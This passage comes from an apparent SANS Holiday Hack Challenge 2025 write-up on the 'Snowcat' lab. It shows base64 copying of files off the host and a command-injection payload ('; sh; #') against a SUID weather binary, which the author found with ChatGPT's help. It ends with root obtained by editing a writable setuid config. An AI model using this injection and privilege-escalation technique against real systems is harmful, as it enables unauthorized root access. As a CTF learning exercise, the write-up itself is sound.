</span></span><span style="display:flex;"><span>cd /usr/local/snowcat/webapps/ROOT/WEB-INF/classes
</span></span><span style="display:flex;"><span>cat weather.db | base64</span></span></code></pre></div>
<p>I copied the Base64 encoded string to my Kali box, decoded and opened it in SQLitebrowser:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cat sqlite.txt | base64 -d &gt; weather.db
</span></span><span style="display:flex;"><span>sqlitebrowser weather.db</span></span></code></pre></div>
<p>Turns out there is just one table here and it contains one password in cleartext:</p>
<p><a href="#R-image-68fbf52984f422b5e5f563087f09b806" class="lightbox-link"><img alt="Passwords" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-11.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-68fbf52984f422b5e5f563087f09b806"><img alt="Passwords" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-11.png"></a></p>
<p>However, I now figured out that the rest of the objective could be solved without this reverse shell. Thus, my writeup takes a slight turn here, where I conduct the attack using the original <em>user</em> account. Moving on to finding finding binaries with the SUID flag set:</p>
<p><a href="#R-image-d2ca617459d106d270731bdea3eb7f6c" class="lightbox-link"><img alt="Finding suid" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-6.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-d2ca617459d106d270731bdea3eb7f6c"><img alt="Finding suid" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-6.png"></a></p>
<p>I identifed the <em>weather</em> folder and the binaries as relevant. Moving on to dissect the binaries I first smuggled them out to my Kali instance:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cat humidity | base64
</span></span><span style="display:flex;"><span>cat pressure | base64
</span></span><span style="display:flex;"><span>cat temperature | base64</span></span></code></pre></div>
<p>In Kali I converted them into binaries:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cat humidity.txt | base64 -d &gt; humidity.bin
</span></span><span style="display:flex;"><span>cat pressure.txt | base64 -d &gt; pressure.bin
</span></span><span style="display:flex;"><span>cat temperature.txt | base64 -d &gt; temperature.bin</span></span></code></pre></div>
<p>Then i opened each <em>.bin</em> file in <a href="https://dogbolt.org" rel="external">Dogbolt</a> to see if they had somethign interesting on the inside:</p>
<p><a href="#R-image-bc82517aa8d0842e7ea23fdc9c439bfc" class="lightbox-link"><img alt="Dogbolt" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-8.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-bc82517aa8d0842e7ea23fdc9c439bfc"><img alt="Dogbolt" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-8.png"></a></p>
<p>Of interesting strings I found the following:</p>
<ul>
<li>&ldquo;/usr/local/weather/config&rdquo;</li>
<li>&ldquo;/usr/local/weather/data/humidity&rdquo;</li>
<li>&ldquo;/usr/local/weather/logUsage&rdquo;</li>
<li>&ldquo;/usr/local/weather/keys/authorized_keys&rdquo;</li>
<li>&ldquo;/usr/local/weather/data/pressure&rdquo;</li>
<li>&ldquo;/usr/local/weather/data/temperature&rdquo;</li>
</ul>
<p>Each binary contained mostly the same strings, one very interesting one was the <em>&quot;/usr/local/weather/keys/authorized_keys&quot;</em> file. It seems like this is the ultimate goal I am looking for. I now had myself a goal, but how to reach it? I took the decompiled code from one of these binaries and fed it into ChatGPT and asked if there were any vulnerabilities present. ChatGPT stated there was a command injection in <em>log_usage()</em> via <em>system()</em>:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#a6e22e">snprintf</span>(v1, <span style="color:#ae81ff">0x100</span>, <span style="color:#e6db74">&#34;%s &#39;%s&#39; &#39;%s&#39;&#34;</span>, <span style="color:#e6db74">&#34;/usr/local/weather/logUsage&#34;</span>, <span style="color:#e6db74">&#34;temperature&#34;</span>, a0);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">system</span>(v1);</span></span></code></pre></div>
<p>In which <em>a0</em> comes from <code>argv (&lt;key&gt;)</code>, so it’s attacker-controlled. Wrapping in single quotes is not considered safe: a key containing &rsquo; will break out of the quoted string and can inject shell syntax. Further ChatGPT stated &ldquo;If this binary is running with elevated privileges at this point (and it is: it calls setuid/setgid from config), this is a classic privilege escalation primitive.&rdquo;</p>
<p>In order to exploit this I needed a valid key, and I found that in the <em>/home/user/weather-jsps</em> folder:</p>
<p><a href="#R-image-1dfaab496f97c1125d5887710cb0974a" class="lightbox-link"><img alt="Finding and testing key" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-7.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-1dfaab496f97c1125d5887710cb0974a"><img alt="Finding and testing key" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-7.png"></a></p>
<p>Key &ldquo;4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6&rdquo; is valid as the screenshot shows. I then crafted this payload after input from ChatGPT:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>/usr/local/weather/humidity <span style="color:#e6db74">&#34;4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6&#39;; sh; #&#34;</span></span></span></code></pre></div>
<p>Unleashing my payload and finding keys:</p>
<p><a href="#R-image-37940a4a2aa2274088de58443ea561f4" class="lightbox-link"><img alt="Finding keys" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-9.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-37940a4a2aa2274088de58443ea561f4"><img alt="Finding keys" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-9.png"></a></p>
<p>The API key I needed was <em>8ade723d-9968-45c9-9c33-7606c49c2201</em></p>
<h3 id="getting-root">Getting ROOT</h3>
<p>Getting root on this box is trivial. While being the user &ldquo;weather&rdquo; I have control over the content in the <em>/usr/local/weather</em> folder. In this folder there&rsquo;s a <em>config</em> file containing:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>username<span style="color:#f92672">=</span>value
</span></span><span style="display:flex;"><span>groupname<span style="color:#f92672">=</span>value</span></span></code></pre></div>
<p>With this user I had write permissions over the config file that is used to determine the setuid and setgid in the <em>humidity</em>, <em>temperature</em> and <em>pressure</em> binaries. By changing the values to <em>root</em> and running <code>/usr/local/weather/humidity &quot;4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6'; sh; #&quot;</code> I got root:</p>
<p><a href="#R-image-d2e82d84f878fb903f12673aaae68546" class="lightbox-link"><img alt="Getting ROOT" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-snowcat-12.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-d2e82d84f878fb903f12673aaae68546"><img alt="Getting ROOT" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-snowcat-12.png"></a></p>
<p>Apparently, the goal mentioned is:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>Lower average winter temperature to -15.4 C
</span></span><span style="display:flex;"><span>Lower average summer temperature to -3.7 C</span></span></code></pre></div>
<h2 id="tom-hessman-mission-debrief">Tom Hessman mission debrief</h2>
<blockquote>
<p>Fantastic work! You&rsquo;ve successfully exploited those vulnerabilities and retrieved the authorization key from the weather monitoring system.</p>
<p>Thanks for helping me get access back - our customers are going to have a much better experience now that we&rsquo;ve got the weather station running again!</p>
</blockquote>

  <footer class="footline">
              <i class='fa-fw fas fa-calendar'></i> Dec 12, 2025
  </footer>
</article>
        </div>
      </main>
    </div>
    <aside id="R-sidebar" class="default-animation">
      <div id="R-header-topbar" class="default-animation"></div>
      <div id="R-header-wrapper" class="default-animation">
        <div id="R-header" class="default-animation">
          <a id="R-logo" class="R-default" href="/index.html">
            <div class="logo-title">SANS Holiday Hack Challenge 2025</div>
          </a>
        </div>
        <search><form action="/search/index.html" method="get">
          <div class="searchbox default-animation">
            <button class="search-detail" type="submit" title="Search (CTRL+ALT+f)"><i class="fas fa-search"></i></button>
            <label class="a11y-only" for="R-search-by">Search</label>
            <input data-search-input id="R-search-by" name="search-by" class="search-by" type="search" placeholder="Search...">
            <button class="search-clear" type="button" data-search-clear="" title="Clear search"><i class="fas fa-times" title="Clear search"></i></button>
          </div>
        </form></search>
      </div>
      <div id="R-homelinks" class="default-animation homelinks">
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-homelinks">
          <ul class="space collapsible-menu">
            <li class="" data-nav-url="/index.html"><a class="padding" href="/index.html"><i class="fa-fw fas fa-home"></i> Home</a></li>
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-headercontrols">
          <ul class="">
          </ul>
        </div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
      </div>
      <div id="R-content-wrapper" class="highlightable">
        <div class="R-sidebarmenu R-shortcutmenu-main">
          <ul class="enlarge morespace collapsible-menu">
            <li class="" data-nav-url="/act1/index.html"><a class="padding" href="/act1/index.html">Act 1</a><ul id="R-subsections-8dc0c36ceefa45529ff4cf1f9bdc1f66" class="collapsible-menu"></ul></li>
            <li class="" data-nav-url="/act2/index.html"><a class="padding" href="/act2/index.html">Act 2</a><ul id="R-subsections-9d3d8c898368693a495088de36411fa6" class="collapsible-menu"></ul></li>
            <li class="parent " data-nav-url="/act3/index.html"><a class="padding" href="/act3/index.html">Act 3</a><ul id="R-subsections-0b6215c9fad834351813cc2ad0d4a335" class="collapsible-menu">
            <li class="" data-nav-url="/act3/gnome-tea/index.html"><a class="padding" href="/act3/gnome-tea/index.html">Gnome Tea</a></li>
            <li class="" data-nav-url="/act3/hack-a-gnome/index.html"><a class="padding" href="/act3/hack-a-gnome/index.html">Hack-a-Gnome</a></li>
            <li class="active " data-nav-url="/act3/snowcat-rce-and-priv-esc/index.html"><a class="padding" href="/act3/snowcat-rce-and-priv-esc/index.html">Snowcat RCE &amp; Priv Esc</a></li>
            <li class="" data-nav-url="/act3/schrodingers-scope/index.html"><a class="padding" href="/act3/schrodingers-scope/index.html">Schrödingers Scope</a></li>
            <li class="" data-nav-url="/act3/find-and-shutdown-frostys-snowglobe-machine/index.html"><a class="padding" href="/act3/find-and-shutdown-frostys-snowglobe-machine/index.html">Find and Shutdown Frostys Snowglobe Machine</a></li>
            <li class="" data-nav-url="/act3/on-the-wire/index.html"><a class="padding" href="/act3/on-the-wire/index.html">On the Wire</a></li>
            <li class="" data-nav-url="/act3/free-ski/index.html"><a class="padding" href="/act3/free-ski/index.html">Free Ski</a></li>
            <li class="" data-nav-url="/act3/snowblind-ambush/index.html"><a class="padding" href="/act3/snowblind-ambush/index.html">Snowblind Ambush</a></li></ul></li>
          </ul>
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-shortcuts">
          <ul class="space collapsible-menu">
          </ul>
        </div>
        <div id="R-footer-margin"></div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-footercontrols">
          <ul class="">
          </ul>
        </div>
<div id="R-footer"><p>Built with <a href="https://github.com/McShelby/hugo-theme-relearn" title="love"><i class="fas fa-heart"></i></a> by <a href="https://gohugo.io/">Hugo</a></p></div>
      </div>
    </aside>
    <script src="/js/js-yaml/js-yaml.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-color.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-dispatch.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-drag.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-ease.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-interpolate.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-selection.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-timer.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-transition.min.js?1766479342" defer></script>
    <script src="/js/d3/d3-zoom.min.js?1766479342" defer></script>
    <script src="/js/mermaid/mermaid.min.js?1766479342" defer></script>
    <script>
      window.relearn.themeUseMermaid = JSON.parse("{}");
    </script>
    <script src="/js/clipboard/clipboard.min.js?1766479342" defer></script>
    <script src="/js/perfect-scrollbar/perfect-scrollbar.min.js?1766479342" defer></script>
    <script src="/js/theme.js?1766479342" defer></script>
  </body>
</html>
